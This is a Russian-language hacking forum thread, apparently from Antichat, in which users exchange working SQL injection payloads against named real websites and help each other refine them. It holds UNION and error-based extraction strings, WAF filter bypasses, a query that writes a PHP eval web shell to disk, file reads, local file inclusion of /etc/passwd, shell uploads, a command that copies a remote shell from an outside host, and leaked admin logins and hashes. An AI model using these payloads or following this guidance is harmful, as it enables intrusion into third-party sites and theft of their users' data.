http://www.bedag.ch/news/news_d.php?id=-64+union+select+1,2,3,4,5,6,7,8,9,10,11,'<?php eval($_GET[‘e’]) ?>',13,14,15,16,17,18,19,20,21,22,23,24,25,26+INTO+O UTFILE+'E:/webroot/a99/a99a-www-www/events/shell.php'+--+

http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+union+/*!select*/+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53

не как не моqу наyтьи column..
помоqите..

http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+order+by+17--

a qde zdes printabelniy column ??

a qde zdes printabelniy column ??


http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),co ncat((Select+version()),floor(rand(0)*2))+From+men us+Group+By+2)a)

вот ссылка

http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80/*

http://www.soulmades.com.au/index.php?ap=2956775%20AND%20ascii%28substring%28% 28database%28%29%29,15,1%29%29=115
database - mades_soulmades
+там 4'тая ветка

Translate!!!!!

Всем приятного времени сутак )
Сразу к делу ..

Черес уязвимост получил логин и парол админа но когда пробую заити как админ говарит што парол/логин непатходит...

Вот сам сайт :ww_w.zhengazeta.by/magia_gadania/category/89

Login: admin
Pw : eXoyMDA4

Настораживает присутствие в сочетание пароля (MDA)... возможна ветом проблема ?

Вопчем уже не первый раз такое , посоветуйте как распознавать разные типы паролей если они зашифрованы ... или что именно не пускает зайти

Силна не пинайте .. спс

Login: admin
Pw : eXoyMDA4

Пароль в BASE64, "yz2008"

Как здесь можно обойти фильтрацию?

http://www.vino-concept.ch/content.php?id=-30+union+select+1,2,3,4,5,6,7,8,9,10+frfromom+info rmation_schema.tables+--+

http://***/view.php?abc=1version()&def=ghi

FUNCTION ttt.1version does not exist

view.php?abc=1version0&def=ghi

Unknown column '1version0' in 'where clause'

что делать?)
единицу нельзя убрать в переди)

Translate !!!!!

Спс Pashkela , Вопчем пропустить через все кодировки ?

http://***/view.php?abc=1version()&def=ghi

FUNCTION ttt.1version does not exist

view.php?abc=1version0&def=ghi

Unknown column '1version0' in 'where clause'

что делать?)
единицу нельзя убрать в переди)

1/**/version0&def=ghi так идет?

']1/**/version0&def=ghi так идет?

нет так тоже пробовал.

делаю запрос

http://xxx/xxx.php?abc=1%version()&def=ghi

получаю в исходном коде :
<input type="hidden" name="id" value="1%version()">

1/**/OR/*d*/user=root

Unknown column 'user' in 'where clause'


1/**/OR/*d*/author=id

<input type="hidden" name="id" value="1/**/OR/*d*/author=id">


не пойму :)



P.S урл дать не могу сайт почти копия milw0rm.com
:P


всем спасибо сам разобрался:
+and(select%201%20from(select%20count(*),concat(us er(),floor(rand(0)*2))x%20from%20information_schem a.tables%20group%20by%20x)a)--&

http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),co ncat((Select+version()),floor(rand(0)*2))+From+men us+Group+By+2)a)

а дальше как ??

http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),co ncat((Select+/*!table_name*/),floor(rand(0)*2))+From+/*!information_schema.tables*/+Group+By+2)a)

не получается..


http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),co ncat((Select+Table_name),floor(rand(0)*2))+From+In formation_Schema.Tables+Group+By+2)a)

и так не получается..

http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),co ncat((Select+tAbLe_NamE),floor(rand(0)*2))+From+iN fOrMation_SchemA.tAblEs+Group+By+2)a)

и так..

а дальше как ??
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),co ncat((Select+table_Name+from+information_schema.ta bles+limit+24,1),floor(rand(0)*2))+From+menus+Grou p+By+2)a)
[-_-]

Feldmarschall, что 4 ветка я знаю, даже знаю имя таблицы где лежат данные юзеров.

тянуть 2 ляма юзеров слепым это жесть

помогите подобрать sql запрос сдесь
http://warsong.ws/exchange/?s=send

ct+column_Nhttp://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),co ncat((Seleame+from+information_schema.columns+wher e+table_Name=0x61646D696E6973747261746F727331+limi t+8,1),floor(rand(0)*2))+From+menus+Group+By+2)a)
а ето как ??

помогите подобрать sql запрос сдесь
http://warsong.ws/exchange/?s=send

так ты уже задавал этот вопрос.. и тебе вроде бы ответили

да, но скрипт изменили уже а ошибка осталась...

"UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 from INFORMATION_SCHEMA.tables #

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 from INFORMATION_SCHEMA.tables #"' at line 1
-----------------------------------------------------------------
А если "UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 from INFORMATION_SCHEMA.tables #

то

The used SELECT statements have a different number of columns
:(

slayzer
"UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 from INFORMATION_SCHEMA.tables #

замени на это -

+or(1,1)=
(select+count(0),concat((select+version()+from+inf ormation_schema.tables+limit+0,1),floor(rand(0)*2) )from(information_schema.tables)group+by+2)

']slayzer

замени на это -

+or(1,1)=
(select+count(0),concat((select+version()+from+inf ormation_schema.tables+limit+0,1),floor(rand(0)*2) )from(information_schema.tables)group+by+2)


Duplicate entry '5.1.43-community1' for key 'group_key'

Duplicate entry '5.1.43-community1' for key 'group_key'

ну все правельно версия 5.1.43-community

а что за конструкция or(1,1)= и как она выглядит в mssql ?

а что за конструкция or(1,1)= и как она выглядит в mssql ?

http://forum.antichat.ru/thread30501.html

вот никак не могу раcкрутить http://www.turkishculturalfoundation.org//pages.php?ID=82
1) вставляю кавычку:
http://www.turkishculturalfoundation.org//pages.php?ID=82'
выводит ошибку (значит уязвимость есть)
2) использую вычитание
http://www.turkishculturalfoundation.org//pages.php?ID=83-1
выводится другая страница (значит уязвимости нету)
3) применяю логику
http://www.turkishculturalfoundation.org//pages.php?ID=82+AND+1=1
http://www.turkishculturalfoundation.org//pages.php?ID=82+AND+1=2
выводит ту же страницу, ничего не изменяется (значит уязвимости нету)

хотел подобрать поля вообще не выводит ошибки=(применял order+by group+by
union+select, заменял все думал фильтр, вставлял кавычки, применял and и тд. тп в id

вывод: шо за......

pinch, это не та ошибка, которая говорит о иньекции.

и какое слово тут говорит что это не инъекция??? или вы сделали вывод из расчета:
http://www.turkishculturalfoundation.org//pages.php?ID=83-1
http://www.turkishculturalfoundation.org//pages.php?ID=82+AND+1=1
http://www.turkishculturalfoundation.org//pages.php?ID=82+AND+1=2

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 117

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 117

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 117

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 79



Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/pages.php on line 297

и какое слово тут говорит что это не инъекция???

об этом говорит хекерская догадка, смотри:
http://www.turkishculturalfoundation.org/pages.php?ID=82' ошибка есть
http://www.turkishculturalfoundation.org/pages.php?ID=82'' ошибки нет
http://www.turkishculturalfoundation.org/pages.php?ID=82''' ошибка есть
вывод=> ковычка слешируется и вырезается (остается слеш)
наглядно:
id='1\'
id='1\\'
id='1\\\'

Нет тут иньекции, стоит фильтрация на отбрасывание правой части.

Есть директория D:\site.ru\index.php
Как прочитать этот файл через SQL-inj?
+union+select+load_file('D:\site.ru\index.php')--
Или
+union+select+load_file('D:/site.ru/index.php')--
?

thanks=)

можно так:
+union+select+load_file('D:/site.ru/index.php')--

можно и так:
+union+select+load_file('D:\\site.ru\\index.php')--

http://www.mzvezda.ru/type/1/51/39/
Кто поможет раскрутить?

привет посоветуйте как тут поступит:
на запрос localhost/script.php?id=1'+order+by+1+--+

ответ:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'order+by+1+--+', now())'
at line 2
вот никак не могу раскрутит еще добавка now())'

привет посоветуйте как тут поступит:
на запрос localhost/script.php?id=1'+order+by+1+--+

ответ:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'order+by+1+--+', now())'
at line 2
вот никак не могу раскрутит еще добавка now())'


localhost/script.php?id=1'%20order%20by%201--

спс попугай но все еще остался now())

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '', now())' at line 2

спс попугай но все еще остался now())

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '', now())' at line 2


попробуй пробелы поставить до и\или после двух тире, либо /* заюзай, или нульбайтом отрежь на крайний случай.

А вообще, похоже ошибка идет во втором запросе, видимо.

%23, #, /*.
1' order by 1,2,3,4,5,6,7,8,9,10,11,12 /*
1 order by 1,2,3,4,5,6,7,8,9,10,11,12 /*
С ковычкой без и т.п.

99% что это инсерт или апдейт. Крутить соответственно

Господа, есть варианты обхода экранирования ?)


statement := 'SELECT * FROM users WHERE name = ' + QuoteParam(userName) + ';';


function QuoteParam(s : string) : string;
{ на входе — строка; на выходе — строка в кавычках и с заменёнными спецсимволами }
var
i : integer;
Dest : string;
begin
Dest := '"';
for i:=1 to length(s) do
case s[i] of
'''' : Dest := Dest + '\''';
'"' : Dest := Dest + '\"';
'\' : Dest := Dest + '\\';
else Dest := Dest + s[i];
end;
QuoteParam := Dest + '"';
end;


+ к переменной можно добавить intval()

Как бы там кавычки не мешаються, name= dasjkhasdjkhsjkhasdkhkajh union select 1, etc...

как можно обойти фильтрацию на select? полей 4

http://www.alpharent.gr/gr/offers.php?id=1

pinch:
http://www.alpharent.gr/gr/offers.php?id=-1+union+/*!select*/+0,1,2,3

Какой функцией нужно делать поиск по БД?

thanks=)

Какой функцией нужно делать поиск по БД?
http://www.mysql.ru/docs/man/String_comparison_functions.html
мм ? или
http://www.mysql.ru/docs/man/Fulltext_Search.html

warlok, а может чо по проще?
А то там ничего не понятно!!!!!

http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),co ncat((Select+column_Name+from+information_schema.c olumns+where+table_Name=0x61646D696E6973747261746F 727331+limit+8,1),floor(rand(0)*2))+From+menus+Gro up+By+2)a)

не мояу наыти column_name
помоqите

Пипл, подскажите как дклать поиск по БД....

warlok, а может чо по проще?
А то там ничего не понятно!!!!!

попроще - заюзай phpmyadmin

попугай, возможнасти залить нету!!!
там есть возможность залить шел через картинку, но только адрес до него что-то типо getimg.php?type=main&file=08736050.php
а прямой путь нужно в БД искать!!!

http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),co ncat((Select+pass+from+administrators+limit+1,1),f loor(rand(0)*2))+From+administrators+Group+By+2)a)

вот нашел table_name и у нево column_name а теперь не получается..
pomoqite..

попугай, возможнасти залить нету!!!
там есть возможность залить шел через картинку, но только адрес до него что-то типо getimg.php?type=main&file=08736050.php
а прямой путь нужно в БД искать!!!

попробуй раскрыть путь, например,
getimg.php?type=main&file[]=08736050.php'
или в папках типа uploads, images глянуть. Это если файлы не в базу записываются.

Вопрос наверное риторический. Наверное многим попадались сайты, где скажем ссылки типа http://site.com/news/news567.html.... Такое чувство, что включен mod rewrite, а не статические страницы. Можно ли здесь найти sql-инъекцию например?

я здесь параметров не вижу

даже если будет

http://site.com/news/news567.php
Ты огорчил весь античат.
567 этo GET запрос какого то параметра.
http://site.com/news/news123456+union+select+1,2,3,4.php
// Привет ЧПУ

Ты огорчил весь античат.
567 этo GET запрос какого то параметра.
http://site.com/news/news123456+union+select+1,2,3,4.php
// Привет ЧПУ

a с чего взял что это GET ?

может просто имя news567

Вопрос наверное риторический. Наверное многим попадались сайты, где скажем ссылки типа http://site.com/news/news567.html.... Такое чувство, что включен mod rewrite, а не статические страницы. Можно ли здесь найти sql-инъекцию например?

apache mod_rewrite

В некоторых случаях, СКЛ инъекция возможна даже в параметре, который преобразуется методами mod_rewrite модуля apache, к GET параметру скрипта.

Например, скрипты типа /news/127.html преобразуются к /news/news.php?id=127 следующим правилом: RewriteRule ^/news/(.*)\.html$ "/news/news.php?id=$1"

Это позволит передать злонамеренные значения параметра скрипту. Так, например /news/128-1.html

Если выводятся подробные сообщения об ошибках, то можно сразу узнать адрес скрипа, и далее, подобрав параметр работать уже с ним. Если же нет, то можно исследовать уязвимость, прямо редактируя имя файла.

ссылка на источник http://www.securitylab.ru/contest/212083.php

Видел давно прогу ,каторая помогает в sql-inj -подбирает поля,кол-во столбцов, может кто скинуть?

SIPT

Через скулю получил таблицу и имена колонок, но когда делаю:
select username from userstable - выдает ошибку
а при select somesolumn from othertable - все нормально
помогите раскрутить. также доступна читалка файлов\каталогов.
http://www.solvex.ru/countries/israel/news/?id=48+and+1=2+union+select+version(),2,3--

unhex(hex()) или же
select username from твоябд.userstable
Всякая проблема может быть :)

забыл добавить, это пробовал.
либо плохо пробовал)
не получлось(

Через скулю получил таблицу и имена колонок, но когда делаю:
select username from userstable - выдает ошибку
а при select somesolumn from othertable - все нормально
помогите раскрутить. также доступна читалка файлов\каталогов.
http://www.solvex.ru/countries/israel/news/?id=48+and+1=2+union+select+version(),2,3--
Админку защищает basic авторизация, может и нет никакой таблицы пользователей.
+ Это mysql на FreeBSD с file_priv.
Можно найти .htaccess и попробовать сбрутить пасс

http://www.qwerty.ru/page.php?id=-999'
-> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-999''' at line 1
http://www.qwerty.ru/page.php?id=1 order by 50
-> ошибка - :Unknown column '50' in 'order clause'

http://www.qwerty.ru/page.php?id=1 order by 2

-> ошибка - :Unknown column '2' in 'order clause'
http://www.qwerty.ru/page.php?id=1 order by 1
-> Грузится норм сайт...
Получается всего 1 столбец ? 0o
http://www.qwerty.ru/page.php?id=1'+union+select+0/*
-> ошибка - :The used SELECT statements have a different number of columns
http://www.qwerty.ru/page.php?id=-1+union+select+0 */
--> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/ AND poz=1' at line 1


подскажите плз что можно сделать?

выложи сайт полностью, посмотрим что там,или там намечается инжекция на важном государственном или военном проекте?
P.S. вообще да, бывает такое что столбец один...

http://www.procctv.ru/page.php?id=-1'

http://www.qwerty.ru/page.php?id=-999'
-> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-999''' at line 1
http://www.qwerty.ru/page.php?id=1 order by 50
-> ошибка - :Unknown column '50' in 'order clause'

http://www.qwerty.ru/page.php?id=1 order by 2

-> ошибка - :Unknown column '2' in 'order clause'
http://www.qwerty.ru/page.php?id=1 order by 1
-> Грузится норм сайт...
Получается всего 1 столбец ? 0o
http://www.qwerty.ru/page.php?id=1'+union+select+0/*
-> ошибка - :The used SELECT statements have a different number of columns
http://www.qwerty.ru/page.php?id=-1+union+select+0 */
--> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/ AND poz=1' at line 1


подскажите плз что можно сделать?


Э, там такого скрипта вообще нет.

ссылку сменил по привычке -)
вот http://www.procctv.ru/page.php?id=-1'

И еще давно видел прогу,аналог Sipt ,только не такая замороченная . елси кто помнит как называется отпишите плиз)

ссылку сменил по привычке -)
вот http://www.procctv.ru/page.php?id=-1'

И еще давно видел прогу,аналог Sipt ,только не такая замороченная . елси кто помнит как называется отпишите плиз)
http://www.procctv.ru/page.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase())--

procctv@localhost:5.0.45-log:cms

И еще давно видел прогу,аналог Sipt ,только не такая замороченная . елси кто помнит как называется отпишите плиз)
SQL helper v2.7 ? Их куча

Помогите докрутить скулю, нет печатного поля а все известные мне методы вывода слепых не выходят
http://www.hoyle.com/game.php?id=-26%20or%20(1=1)%20order%20by%2025%20--

Помогите докрутить скулю, нет печатного поля а все известные мне методы вывода слепых не выходят
**********/?id=-26%20or%20(1=1)%20order%20by%2025%20--

http://*****/?id=-26%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

version - 5.0.45

Подскажите плиз прогу для подбора каталогов ,аналог хед пельмешки ,только что бы не на перле

Может кто подскажет, залил шел через картинку, и получилас ссылка типа
getimg.php?type=plandrawings&file=095244731.php

кто подскажет что можно сделать?

Поиск дирректорий типа images files и тому подобных ничего не дал!!!

ты эт через скулю залил шоль??

Нет, через админку, через добавление картинки.

как вытащить остальные db_name() из MS SQL 2000 ?

Решенно! забыл просто вот так... db_name(1).. (2) итд

в админке есть возможность заливать фото, но при попытке залить шелл выскакивает ошибка Warning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: '../photos/books/1271963332.php' is not a valid JPEG file in /home/agencevu/www/admin/liste_livres.php on line 281

видимо php функция, проверяеть содержимое файла, и если не jpeg, то не заливает. я правильно понял? и можно ли какнить обойти это ограничение?

[Feldmarschall] если нет доступа то никак наверно!!!

[Feldmarschall] если нет доступа то никак наверно!!!
-.-... а по серьезней можно? ок?

если не выводятся цифры от полей на странице, даже при id=99999999 что это может быть??? пробовал делать hex(null) не катит проставил version() во все поля не выводит

если не выводятся цифры от полей на странице, даже при id=99999999 что это может быть??? пробовал делать hex(null) не катит проставил version() во все поля не выводит
первый запрос до union вернул true или блинд!

если не выводятся цифры от полей на странице, даже при id=99999999 что это может быть??? пробовал делать hex(null) не катит проставил version() во все поля не выводит

попробуй id=-99999999
мб слепая

пробовал -9999 не катит ладно ссылка полей 37:http://www.staysafe.ca/index.php?action=showcats&category=1

пробовал -9999 не катит ладно ссылка полей 37:http://www.staysafe.ca/index.php?action=showcats&category=1http://www.staysafe.ca/index.php?action=showcats&category=1+and%20%28select%201%20from%20%28select% 20count%280%29,concat%28version%28%29,floor%28rand %280%29*2%29%29%20from%20%28select%201%20union%20s elect%202%20union%20select%203%29x%20group%20by%20 2%29a%29--+ERROR BC: Duplicate entry '5.0.90-community1' for key 1

интересна...
вот мне интересна floor() rand() где про них можно почитать всегда на них сталкиваюсь иль по другому еще можно сделать запрос? и как называется эта инъекция (в смысле фильтрация иль что???)

интересна...
вот мне интересна floor() rand() где про них можно почитать всегда на них сталкиваюсь иль по другому еще можно сделать запрос? и как называется эта инъекция (в смысле фильтрация иль что???)сюда http://forum.antichat.ru/thread119047-blind.html

спасиб

в админке есть возможность заливать ...


личку смотри

Есть вот такая скуль:
Select count(v1.id) as count FROM user_table as v1 WHERE v1.step='9' && v1.sex=1\' && v1.age1 >= '18' && v1.age1 <= '99' && v1.country='1' && v1.plzahl like'1%' && v1.zeitlogin>1114276250 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' && v1.age1 >= '18' && v1.age1 <= '99' && v1.country='1' && v1.plzahl like'1%'' at line 3
Но что-то никак не выходит раскрутить, подскажите гуру как тут можно сформировать строку правильно?

123456 union select 1 --

как добавить фрейм на странички сделанные в асп?

как добавить фрейм на странички сделанные в асп?
<IFRAME id="frame1" src="http://forum.antichat.ru" runat="server">

Подскажите.. разбираюсь щас с пхп-инъекц..
нашел сайт, там присутствует локальный инклюд, внешнего нету, что я могу зделать???
могу ли чтото добыть интересное или залить шелл какимто образом??
сайт: http://www.sidi-kaouki.com/new/index.php?f=../../../../../../../etc/passwd

Подскажите.. разбираюсь щас с пхп-инъекц..
нашел сайт, там присутствует локальный инклюд, внешнего нету, что я могу зделать???
могу ли чтото добыть интересное или залить шелл какимто образом??
сайт: http://www.sidi-kaouki.com/new/index.php?f=../../../../../../../etc/passwd

попробуй найти путь к скриптам и инклудить скрипты

Подскажите.. разбираюсь щас с пхп-инъекц..
нашел сайт, там присутствует локальный инклюд, внешнего нету, что я могу зделать???
могу ли чтото добыть интересное или залить шелл какимто образом??
сайт: http://www.sidi-kaouki.com/new/index.php?f=../../../../../../../etc/passwdlogin admin' or 1=1/*
пасс любой.

крута))) спс

Ctacok
Это мне было адресовано? это в смысле там одна колонка будет? просто как не составлял запрос, ничего не выходит, подобрать колонки не удается :(
Чтоб было понятнее:
Пост запрос http://www.flirt-hunter.de/dating/kontaktanzeigen.php?fill=1&profilstep=0&country=1&sex=112'&altervon=18&alterbis=99&plzahl=1&Submit=Suchen
Уязвимость по идее в sex.

Ctacok
Это мне было адресовано? это в смысле там одна колонка будет? просто как не составлял запрос, ничего не выходит, подобрать колонки не удается :(
Чтоб было понятнее:

Уязвимость по идее в sex.
Тогда так
http://www.flirt-hunter.de/dating/kontaktanzeigen.php?fill=1&profilstep=0&country=1&sex=-1+or%281,1%29=%28select+count%280%29,concat%28%28s elect+database%28%29+from+information_schema.table s+limit+0,1%29,floor%28rand%280%29*2%29%29from%28i nformation_schema.tables%29group+by+2%29--++&altervon=18&alterbis=99&plzahl=1&Submit=Suchen
Duplicate entry 'inlove241' for key 1
database=inlove24

del

как можно обойти фильтрацию на select?? замучался уже стоит WAF

как можно обойти фильтрацию на select?? замучался уже стоит WAF
может быть чето вроде +union+/*!select*/+1 а может и нет, вообще бессмыслено что то думать без ссылки.
--------------------
заливал кто шел через webasyst ? какие методы есть ?

редиректит на гугль
пробовал
/* */
/*! */
/*!12345 */
не катит....

редиректит на гугль
пробовал
/* */
/*! */
/*!12345 */
не катит....


('...'+'...') так?

народ прошу помоши в раскрутке через floor rand

вот версию и др инфо выводится норм но вот никак не могу выводит именя таблиц и колонок.
_http://www.le ve lst oc k.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select%20count(*),conca t(version(),0x3a,floor(rand()*2))x%20from%20(selec t%201%20union%20select%202)a%20group%20by%20x%20li mit%201)--

_http://www.le ve ls to ck.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select%20count(*),conca t(database(),0x3a,floor(rand()*2))x%20from%20(sele ct%201%20union%20select%202)a%20group%20by%20x%20l imit%201)--

может кто посоветует с правильным запросом для таблиц и колонок. Тут как только добавляю про information_schema.tables сразу ругается

Просто фильтрация на from information_schema.tables

ну знаю что может быть фильтрация но я основном мучаюс что не могу составит правильный запрос с таким типам скуля. Ну стандартные вроде знаю но тут метод Qwazar как то не очень то гоняю. Попробовал через toolza там тоже не пашет

как можно обойти фильтрацию на select?? замучался уже стоит WAF

ну могыт так: selselectect )) хз


Мужики))хдд
http://www.bilandima.ru/html/promofoto.php?p=156_anasteshiya' ДИМА БИЛАН))хы

http://www.keyin.ca/news.asp?id=52&news=showall

может найдется чувак который обойдет фильтр на select

http://www.keyin.ca/admin/default.asp

в поле логин admin' or (1,2)=(select * from (select name_const(version(),1),name_const(version(),1))x)--
Duplicate column name '5.0.67.d7-ourdelta-log'

это хорошо..=) но надо select обойти... меня не интересует админский доступ
очень интересует именно обход фильтра на select

это хорошо..=) но надо select обойти... меня не интересует админский доступ
очень интересует именно обход фильтра на select
Крутите так, какая разница нах...
Какой обход.

' and (select 1 from (select count(0),concat(database(),':',user(),floor(rand(0 )*2)) from (select 1 union select 2 union select 3)x group by 2)a)#Duplicate entry 'keyincollege:keyincollege@72.167.232.1721' for key 1ps file_priv у юзера нет!

hahhaha т.е. какой нахер админский доступ, я имелл ввиду не уязвимость в другом параметре а именно обход фильтрации select в параметре id http://www.keyin.ca/news.asp?id=52&news=showall

hahhaha т.е. какой нахер админский доступ, я имелл ввиду не уязвимость в другом параметре а именно обход фильтрации select в параметре id http://www.keyin.ca/news.asp?id=52&news=showall
http://www.keyin.ca/news.asp?id=-52+union+%73%65%6C%65%63%74+1,2,3,version(),5&news=showall

thanks как я недодумался....

WordPress 2.7.1
Имею ввиду уязвимость, позволяющая узнать пароль админа, сбросить его себе на ящик, подменить исполняемый код, SQL инъекция, узнать e-mail администратора?

Условие - регистрация закрыта, постинг запрещён, для рядового пользователя разрешены только комментарии.

На этом сайте достал такие hash

http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_use rName,g_hashedPassword)+from+g2_User+--+

guest:LajD09f455fd66378f12280bfd7894ce5b46
admin:kNaScfa395e30ad8195a4975c91eee51f33c

подбор

09f455fd66378f12280bfd7894ce5b46:LajD

В админку попасть не удается

http://slr-zone.com/shop/

Что можете еще посоветовать?

Заранее всем спасибо!

народ прошу помоши в раскрутке через floor rand

вот версию и др инфо выводится норм но вот никак не могу выводит именя таблиц и колонок.
_http://www.le ve lst oc k.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select%20count(*),conca t(version(),0x3a,floor(rand()*2))x%20from%20(selec t%201%20union%20select%202)a%20group%20by%20x%20li mit%201)--

_http://www.le ve ls to ck.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select%20count(*),conca t(database(),0x3a,floor(rand()*2))x%20from%20(sele ct%201%20union%20select%202)a%20group%20by%20x%20l imit%201)--

может кто посоветует с правильным запросом для таблиц и колонок. Тут как только добавляю про information_schema.tables сразу ругается

esli tebya mysql version() toqda..
http://www.levelstock.com/mod/emarket/index.php?page=2&sort=(select*from(select+name_const(version(),1),n ame_const(version(),1))a)

На этом сайте достал такие hash

http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_use rName,g_hashedPassword)+from+g2_User+--+

guest:LajD09f455fd66378f12280bfd7894ce5b46
admin:kNaScfa395e30ad8195a4975c91eee51f33c

подбор

09f455fd66378f12280bfd7894ce5b46:LajD

В админку попасть не удается

http://slr-zone.com/shop/

Что можете еще посоветовать?

Заранее всем спасибо!


прозреваю, что это хеши от старой инсталляции gallery2, которая лежит в какой-то папке на серве.

http://slr-zone.com/shop/ - это неустановленная gallery2, можешь завершить инсталляцию, вписав свои данные и там видно будет.

подскажите что это?
http://www.hack0wn.com/view.php?xroot=271.0+order+by+1--&cat=exploits
есть ли тут уязвимость?

есть) хекеры там типо:

http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+co unt(0),concat((select+version()),floor(rand(0)*2)) +from+information_schema.tables+group+by+2+limit+1 )a)--+&cat=exploits

Подскажите, возможно ли как-нибудь все-таки скормить урл для include($MEGA-VARIABLE.'file.php'), если перед этим он редактируется вот так:
preg_replace( "/[a-z]/i", "", $MEGA-VARIABLE);

Или без вариантов?

PS Можно айпи дать напрямую, но http съедается..

если FreeBsD криво настроенный - то можно содержимое папочек увидеть

есть) хекеры там типо:

http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+co unt(0),concat((select+version()),floor(rand(0)*2)) +from+information_schema.tables+group+by+2+limit+1 )a)--+&cat=exploits

а так такую уязвимость через тулзу раскрутить ?
сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось :(

http://www.oragir.am/news.php?id=-13%27a

tut sql ??

нет

esli tebya mysql version() toqda..
http://www.levelstock.com/mod/emarket/index.php?page=2&sort=(select*from(select+name_const(version(),1),n ame_const(version(),1))a)
нет версию и дбнайм я сам смогу взят но кто нит подскажите как далше вывести имена таблиц и колонок

Залил через скуль конструкцию вида <?system ($_GET ['cmd']);?> , сервер работает под виндой, wget и curl не катят, как можно залить полноценный шелл?

Залил через скуль конструкцию вида <?system ($_GET ['cmd']);?> , сервер работает под виндой, wget и curl не катят, как можно залить полноценный шелл?

льешь <?php eval(stripslashes($_GET[id])); ?>

http://site.ru/shell.php?id=copy('http://google.ru/shell.php','/куда/лить/shell.php');

Пипл, подскажите, есть доступ к phpMyAdmin. Как залить полноценный шел?

Пипл, подскажите, есть доступ к phpMyAdmin. Как залить полноценный шел?

http://forum.antichat.ru/showthread.php?p=1000812

Konqi, а это разве полноценный шел получиться??

Konqi, а это разве полноценный шел получиться??

http://forum.antichat.ru/showthread.php?t=43015
http://defeated.ru/showthread.php?p=9987

а так такую уязвимость через тулзу раскрутить ?
сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось :(


$method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
$f_table = "information_schema.tables"; #
$f_url = "http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+"; # url
$f_plus = "+"; # %20,%2b & etc.
$f_filtr = "a)--+&cat=exploits"; # close SQL

-----------------------------------------
System information:
-----------------------------------------
base:hack0wn
basedir:/usr/
datadir:/var/lib/mysql/
os:redhat-linux-gnu
tmpdir:/tmp/
ver:5.0.86-log
-----------------------------------------
Tables in information_schema.tables - 27
-----------------------------------------
ROUTINES
VIEWS
SCHEMA_PRIVILEGES
advisories
SCHEMATA
bins
PROFILING
exploits
KEY_COLUMN_USAGE
comments
COLLATIONS
TABLE_CONSTRAINTS
profiles
COLUMN_PRIVILEGES
TABLE_PRIVILEGES
shellcodes
COLUMNS
TRIGGERS
sources
CHARACTER_SETS
TABLES
papers
COLLATION_CHARACTER_SET_APPLICABILITY
USER_PRIVILEGES
videos
STATISTICS
misc

Pashkela
Это чем?

https://forum.antichat.net/thread148915-toolza.html